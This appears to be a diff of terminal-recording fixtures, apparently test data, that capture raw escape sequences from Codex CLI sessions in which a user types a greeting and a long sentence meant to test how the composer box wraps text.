{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[18;1H\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mImprove documentation in @filename\u001b[20;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-tXbGez\u001b[18;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[34C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[34C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":3484,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[32m\u001b[1m\u001b[Harkon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-tXbGez\u001b(B\u001b[m$ exec codex\u001b[K\u001b[33m\r\n⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\u001b[39m\u001b[K\r\n \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\u001b[K\r\n \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[39m\u001b[K\r\n\u001b[K\u001b[2m\r\n╭─────────────────────────────────────────────────╮\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-tXbGez\u001b[2m │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n╰─────────────────────────────────────────────────╯\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\u001b[K\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\u001b[K\r\n reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1m\r\n›\u001b(B\u001b[m\u001b[1X\u001b[2m\u001b[CImprove documentation in @filename\u001b(B\u001b[m\u001b[K\r\n\u001b[K\u001b[20;2H\u001b[1K\u001b[38;5;223m\u001b[Cgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-tXbGez\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[18;3H"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":208,"data":"h\u001b[K\u001b[20;80H\u001b[K\u001b[18;4H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":93,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;5H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":89,"data":"l\u001b[K\u001b[20;80H\u001b[K\u001b[18;6H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":92,"data":"l\u001b[K\u001b[20;80H\u001b[K\u001b[18;7H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":90,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;8H"}
|
||||
@@ -0,0 +1,250 @@
|
||||
{"scenario":"wrap","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T01:50:52.462Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":0,"data":"\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":32,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b(B\u001b[m$ "}
|
||||
{"delayMs":650,"data":"exec codex\r\n"}
|
||||
{"delayMs":437,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":181,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":4,"data":"\r\n\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[2;30r\u001b[2;1H\u001bM\u001bM\u001bM\u001b[1;30r\u001b[2;1H"}
|
||||
{"delayMs":0,"data":"\u001b[33m⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\r\n\u001b(B\u001b[m"}
|
||||
{"delayMs":1,"data":" \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[6;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-VGU83J\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[14;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mWrite tests for @filename\u001b[16;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b[14;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":6,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;28H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":19,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;28H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":6,"data":"\u001b[6;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[14;28H\u001b[K\u001b[16;80H\u001b[K\u001b[14;3H"}
|
||||
{"delayMs":160,"data":"\u001b[6;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001b[5;30r\u001b[5;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001b[1;30r\u001b[5;1H"}
|
||||
{"delayMs":0,"data":"\r\n\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-VGU83J\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\r\n"}
|
||||
{"delayMs":0,"data":" reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[18;1H\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mWrite tests for @filename\u001b[20;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b[18;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":18,"data":"\u001b[25C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":1,"data":"\u001b[25C\u001b[K\u001b[20;80H\u001b[K\u001b[18;3H"}
|
||||
{"delayMs":3478,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[18;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[32m\u001b[1m\u001b[Harkon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b(B\u001b[m$ exec codex\u001b[K\u001b[33m\r\n⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\u001b[39m\u001b[K\r\n \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\u001b[K\r\n \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[39m\u001b[K\r\n\u001b[K\u001b[2m\r\n╭─────────────────────────────────────────────────╮\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-VGU83J\u001b[2m │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n╰─────────────────────────────────────────────────╯\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\u001b[K\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\u001b[K\r\n reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1m\r\n›\u001b(B\u001b[m\u001b[1X\u001b[2m\u001b[CWrite tests for @filename\u001b(B\u001b[m\u001b[K\r\n\u001b[K\u001b[20;2H\u001b[1K\u001b[38;5;223m\u001b[Cgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[18;3H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"delayMs":232,"data":"t\u001b[K\u001b[20;80H\u001b[K\u001b[18;4H"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":27,"data":"h\u001b[K\u001b[20;80H\u001b[K\u001b[18;5H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":27,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;6H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;7H"}
|
||||
{"keyAt":true,"data":"q"}
|
||||
{"delayMs":26,"data":"q\u001b[K\u001b[20;80H\u001b[K\u001b[18;8H"}
|
||||
{"keyAt":true,"data":"u"}
|
||||
{"delayMs":17,"data":"u\u001b[K\u001b[20;80H\u001b[K\u001b[18;9H"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"delayMs":28,"data":"i\u001b[K\u001b[20;80H\u001b[K\u001b[18;10H"}
|
||||
{"keyAt":true,"data":"c"}
|
||||
{"delayMs":27,"data":"c\u001b[K\u001b[20;80H\u001b[K\u001b[18;11H"}
|
||||
{"keyAt":true,"data":"k"}
|
||||
{"delayMs":27,"data":"k\u001b[K\u001b[20;80H\u001b[K\u001b[18;12H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"b"}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;13H"}
|
||||
{"delayMs":16,"data":"b\u001b[K\u001b[20;80H\u001b[K\u001b[18;14H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"delayMs":30,"data":"r\u001b[K\u001b[20;80H\u001b[K\u001b[18;15H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":27,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;16H"}
|
||||
{"keyAt":true,"data":"w"}
|
||||
{"delayMs":27,"data":"w\u001b[K\u001b[20;80H\u001b[K\u001b[18;17H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":27,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;18H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"f"}
|
||||
{"delayMs":45,"data":"\u001b[Cf\u001b[K\u001b[20;80H\u001b[K\u001b[18;20H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":27,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;21H"}
|
||||
{"keyAt":true,"data":"x"}
|
||||
{"delayMs":26,"data":"x\u001b[K\u001b[20;80H\u001b[K\u001b[18;22H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;23H"}
|
||||
{"keyAt":true,"data":"j"}
|
||||
{"keyAt":true,"data":"u"}
|
||||
{"delayMs":27,"data":"j\u001b[K\u001b[20;80H\u001b[K\u001b[18;24H"}
|
||||
{"keyAt":true,"data":"m"}
|
||||
{"delayMs":46,"data":"um\u001b[K\u001b[20;80H\u001b[K\u001b[18;26H"}
|
||||
{"keyAt":true,"data":"p"}
|
||||
{"delayMs":26,"data":"p\u001b[K\u001b[20;80H\u001b[K\u001b[18;27H"}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"delayMs":28,"data":"s\u001b[K\u001b[20;80H\u001b[K\u001b[18;28H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;29H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":16,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;30H"}
|
||||
{"keyAt":true,"data":"v"}
|
||||
{"delayMs":31,"data":"v\u001b[K\u001b[20;80H\u001b[K\u001b[18;31H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":26,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;32H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"delayMs":28,"data":"r\u001b[K\u001b[20;80H\u001b[K\u001b[18;33H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":26,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;34H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":45,"data":"th\u001b[K\u001b[20;80H\u001b[K\u001b[18;36H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":27,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;37H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;38H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":27,"data":"l\u001b[K\u001b[20;80H\u001b[K\u001b[18;39H"}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"keyAt":true,"data":"z"}
|
||||
{"delayMs":28,"data":"a\u001b[K\u001b[20;80H\u001b[K\u001b[18;40H"}
|
||||
{"keyAt":true,"data":"y"}
|
||||
{"delayMs":26,"data":"z\u001b[K\u001b[20;80H\u001b[K\u001b[18;41H"}
|
||||
{"delayMs":17,"data":"y\u001b[K\u001b[20;80H\u001b[K\u001b[18;42H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":29,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;43H"}
|
||||
{"keyAt":true,"data":"d"}
|
||||
{"delayMs":27,"data":"d\u001b[K\u001b[20;80H\u001b[K\u001b[18;44H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":27,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;45H"}
|
||||
{"keyAt":true,"data":"g"}
|
||||
{"delayMs":27,"data":"g\u001b[K\u001b[20;80H\u001b[K\u001b[18;46H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"delayMs":45,"data":"\u001b[Ca\u001b[K\u001b[20;80H\u001b[K\u001b[18;48H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":26,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;49H"}
|
||||
{"keyAt":true,"data":"d"}
|
||||
{"delayMs":28,"data":"d\u001b[K\u001b[20;80H\u001b[K\u001b[18;50H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":26,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;51H"}
|
||||
{"keyAt":true,"data":"k"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":27,"data":"k\u001b[20;80H\u001b[K\u001b[18;52H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":26,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;53H"}
|
||||
{"delayMs":17,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;54H"}
|
||||
{"keyAt":true,"data":"p"}
|
||||
{"delayMs":28,"data":"p\u001b[K\u001b[20;80H\u001b[K\u001b[18;55H"}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"delayMs":27,"data":"s\u001b[K\u001b[20;80H\u001b[K\u001b[18;56H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;57H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"keyAt":true,"data":"u"}
|
||||
{"delayMs":27,"data":"r\u001b[K\u001b[20;80H\u001b[K\u001b[18;58H"}
|
||||
{"delayMs":17,"data":"u\u001b[K\u001b[20;80H\u001b[K\u001b[18;59H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":29,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;60H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":26,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;61H"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"delayMs":28,"data":"i\u001b[K\u001b[20;80H\u001b[K\u001b[18;62H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":26,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;63H"}
|
||||
{"keyAt":true,"data":"g"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":45,"data":"g\u001b[K\u001b[20;80H\u001b[K\u001b[18;65H"}
|
||||
{"keyAt":true,"data":"u"}
|
||||
{"delayMs":28,"data":"u\u001b[K\u001b[20;80H\u001b[K\u001b[18;66H"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":27,"data":"n\u001b[K\u001b[20;80H\u001b[K\u001b[18;67H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"delayMs":27,"data":"t\u001b[K\u001b[20;80H\u001b[K\u001b[18;68H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":45,"data":"il\u001b[K\u001b[20;80H\u001b[K\u001b[18;70H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":28,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;71H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"delayMs":26,"data":"t\u001b[K\u001b[20;80H\u001b[K\u001b[18;72H"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":28,"data":"h\u001b[K\u001b[20;80H\u001b[K\u001b[18;73H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":45,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;75H"}
|
||||
{"keyAt":true,"data":"c"}
|
||||
{"delayMs":27,"data":"c\u001b[K\u001b[20;80H\u001b[K\u001b[18;76H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":28,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;77H"}
|
||||
{"keyAt":true,"data":"m"}
|
||||
{"keyAt":true,"data":"p"}
|
||||
{"delayMs":27,"data":"m\u001b[K\u001b[20;80H\u001b[K\u001b[18;78H"}
|
||||
{"delayMs":16,"data":"p\u001b[K\u001b[20;80H\u001b[K\u001b[18;79H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":30,"data":"o\u001b[K\u001b[2B\u001b[K\u001b[2A"}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"delayMs":27,"data":"s\u001b[K\u001b[20;80H\u001b[K\u001b[18;81H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":27,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;82H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"delayMs":27,"data":"r\u001b[K\u001b[20;80H\u001b[K\u001b[18;83H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":16,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;84H"}
|
||||
{"keyAt":true,"data":"b"}
|
||||
{"delayMs":30,"data":"b\u001b[K\u001b[20;80H\u001b[K\u001b[18;85H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":27,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;86H"}
|
||||
{"keyAt":true,"data":"x"}
|
||||
{"delayMs":27,"data":"x\u001b[K\u001b[20;80H\u001b[K\u001b[18;87H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":26,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;88H"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":17,"data":"h\u001b[K\u001b[20;80H\u001b[K\u001b[18;89H"}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"delayMs":28,"data":"a\u001b[K\u001b[20;80H\u001b[K\u001b[18;90H"}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"delayMs":27,"data":"s\u001b[K\u001b[20;80H\u001b[K\u001b[18;91H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":28,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;92H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"delayMs":26,"data":"t\u001b[K\u001b[20;80H\u001b[K\u001b[18;93H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;94H"}
|
||||
{"delayMs":16,"data":"\u001b[K\u001b[20;80H\u001b[K\u001b[18;95H"}
|
||||
{"keyAt":true,"data":"w"}
|
||||
{"delayMs":30,"data":"w\u001b[K\u001b[20;80H\u001b[K\u001b[18;96H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"delayMs":27,"data":"r\u001b[K\u001b[20;80H\u001b[K\u001b[18;97H"}
|
||||
{"keyAt":true,"data":"a"}
|
||||
{"delayMs":26,"data":"a\u001b[K\u001b[20;80H\u001b[K\u001b[18;98H"}
|
||||
{"keyAt":true,"data":"p"}
|
||||
{"delayMs":27,"data":"p\u001b[K\u001b[20;80H\u001b[K\u001b[18;99H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[17;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"delayMs":1,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[mthe\u001b[Cquick\u001b[Cbrown\u001b[Cfox\u001b[Cjumps\u001b[Cover\u001b[Cthe\u001b[Clazy\u001b[Cdog\u001b[Cand\u001b[Ckeeps\u001b[Crunning\u001b[Cuntil\u001b[Cthe\u001b[Ccomposer\u001b[Cbox\u001b[Chas\u001b[Cto\u001b[Cwrap\u001b[21;3H\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-VGU83J\u001b[19;3H\u001b(B\u001b[m"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":42,"data":"\u001b[18;99H\u001b[K\u001b[19;3Hth\u001b[21;80H\u001b[K\u001b[19;5H"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"delayMs":29,"data":"\u001b[18;99H\u001b[K\u001b[19;5Hi\u001b[K\u001b[21;80H\u001b[K\u001b[19;6H"}
|
||||
{"keyAt":true,"data":"s"}
|
||||
{"delayMs":27,"data":"\u001b[18;99H\u001b[K\u001b[19;6Hs\u001b[K\u001b[21;80H\u001b[K\u001b[19;7H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[18;99H\u001b[K\u001b[19;7H\u001b[K\u001b[21;80H\u001b[K\u001b[19;8H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":26,"data":"\u001b[18;99H\u001b[K\u001b[19;8Hl\u001b[K\u001b[21;80H\u001b[K\u001b[19;9H"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"keyAt":true,"data":"n"}
|
||||
{"delayMs":45,"data":"\u001b[18;99H\u001b[K\u001b[19;9Hin\u001b[K\u001b[21;80H\u001b[K\u001b[19;11H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":27,"data":"\u001b[18;99H\u001b[K\u001b[19;11He\u001b[K\u001b[21;80H\u001b[K\u001b[19;12H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"delayMs":27,"data":"\u001b[18;99H\u001b[K\u001b[19;12H\u001b[K\u001b[21;80H\u001b[K\u001b[19;13H"}
|
||||
{"keyAt":true,"data":"t"}
|
||||
{"delayMs":27,"data":"\u001b[18;99H\u001b[K\u001b[19;13Ht\u001b[K\u001b[21;80H\u001b[K\u001b[19;14H"}
|
||||
{"keyAt":true,"data":"w"}
|
||||
{"keyAt":true,"data":"i"}
|
||||
{"delayMs":45,"data":"\u001b[18;99H\u001b[K\u001b[19;14Hwi\u001b[K\u001b[21;80H\u001b[K\u001b[19;16H"}
|
||||
{"keyAt":true,"data":"c"}
|
||||
{"delayMs":28,"data":"\u001b[18;99H\u001b[K\u001b[19;16Hc\u001b[K\u001b[21;80H\u001b[K\u001b[19;17H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":26,"data":"\u001b[18;99H\u001b[K\u001b[19;17He\u001b[K\u001b[21;80H\u001b[K\u001b[19;18H"}
|
||||
{"keyAt":true,"data":" "}
|
||||
